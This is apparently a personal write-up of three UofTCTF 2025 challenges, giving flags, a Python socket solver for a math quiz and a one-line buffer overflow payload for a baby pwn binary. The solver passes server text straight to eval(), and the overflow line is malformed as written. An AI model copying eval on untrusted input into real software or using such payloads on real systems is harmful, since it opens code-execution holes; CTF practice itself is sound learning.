UofT CTF 2025

Sat, 11 - 13 Jan 2025.

✨ Misc

Sanity check

Description

Welcome to UofTCTF 2025!

Looking for the flag? Make sure you join the Discord server. The flag format is uoftctf{...}.

This is just sanity check chall, so just input the flag that was given on discord.

Flag :

uoftctf{welcome_to_uoftctf_2025!!!!!}

Math test

Description

Complete this simple math test to get the flag.

nc 34.66.235.106 5000

Author: White

866B

chall.py

Open

challenge source code

Solve

In this challenge, i have to solve all math questions from the server. When i check into the source code, it's endless 1000 questions with crazy numbers range💀💀. "I can't doing ts for rest of competition". So, i decided to make a solver script in python. In that script, it solve any questions from the server correctly. Just connect it with socket, and damnnn. you got the flag.

Here is my code to solve this 1000 math questions

import socket
import re

def solve_math_problem(problem):
    try:
        return eval(problem)
    except ZeroDivisionError:
        return None


def main():
    host = "34.66.235.106"
    port = 5000

    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.connect((host, port))

        while True:
            data = s.recv(1024).decode()
            if not data:
                break
            
            print(data)

            match = re.search(r'Question: ([-+*//\d\s]+)', data)
            if match:
                problem = match.group(1).strip()
                print(f"Solving: {problem}")
                
                answer = solve_math_problem(problem)
                if answer is not None:
                    s.sendall(f"{int(answer)}\n".encode())
                else:
                    print("Zero division error occurred.")
                    break

            # Print the flag 
            if "Congratz!" in data:
                print(data)
                break

if __name__ == "__main__":
    main()

Flag :

uoftctf{7h15_15_b451c_10_7357_d16u153d_45_4_m47h_7357}

💻 Pwn

baby-pwn

Description

Here's a baby pwn challenge for you to try out. Can you get the flag?

nc 34.162.142.123 5000

Author: atom

3KB

baby-pwn.zip

archive

Open

challenge attachment

Solve

As we see at first, this challenge provide the source code and compiled one. We can buffer overflow this chall by passing some 64 + 8 bit input

python3 -c 'print("A" * 64 + "B" * 8 + \x66\x11\x40\x00\x00\x00\x00\x00)' | ./chal

You can change the "./chal" with netcat or the original program. Once we run the payload, we'll get this flag

Flag :

uoftctf{buff3r_0v3rfl0w5_4r3_51mp13_1f_y0u_kn0w_h0w_t0_d0_1t}

Thanks for read this writeup. If u wanna support me, buy me a coffee here or click button below